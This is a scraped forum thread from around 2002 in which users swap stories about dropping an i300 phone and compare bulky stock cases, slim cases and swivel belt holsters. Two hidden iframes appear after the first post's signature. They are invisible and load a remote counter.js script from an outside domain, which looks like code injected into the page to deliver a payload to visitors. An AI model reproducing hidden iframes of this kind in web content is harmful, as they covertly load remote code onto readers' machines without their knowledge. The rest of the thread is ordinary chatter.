+ Reply to Thread

Thread: It DROPPED!!!

User ***** Rulz Enforcer

Red face It DROPPED!!!

My phone just dropped from about 5 feet....

It was wearing the bulky case that comes with the phone.. it bounced and landed softly!!

Picked it up, not a bang, scratch, or glitch!!!

Now I have second thoughts about getting another case!, this one is so bulky it can save it from falls!

Anyone in Boston have the e/b case? I'd like a close up look if possible.

tia

chris<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I don't see how you all can use those bulky cases. Takes away from the convenience of the phone for me. I need a case thats just as sleek and cutting edge as the phone. I've dropped my phone from 5 feet with NO CASE and not a scratch baby!

All the phone really needs is a plastic holster with a belt clip like most phones have available. that would be perfect as long as the clip is a swivel.

-jet

I, too have dropped the i300 several times while in the stock case. Seems to be an easy unit to fumble! Today I took a call while using the stock case and decided to just fold the flap back and let the velcro strap scratch my head while I talked. Alas, the cover flap slipped from my fingers and whapped me in the forehead, but I continued on as if nothing happened. Several people walked by and muttered "What the &*$%# is that guy doing?". I'm sure they we're all looking around for the "Candid Camera's".

No pictures attatched!
    Dr. Dan

Lord Emperor of Rome
    You need the basic swivel adhesive back.
    I bought it at the Sprint store for $11.
    The front is exposed but I wore it to the Spurs game last night and didn't get any beer on it!

:p

It came with a small adhesive holder that I use in my car too...
    Last edited by JMSPayroll; 01-23-2002 at 09:40 PM.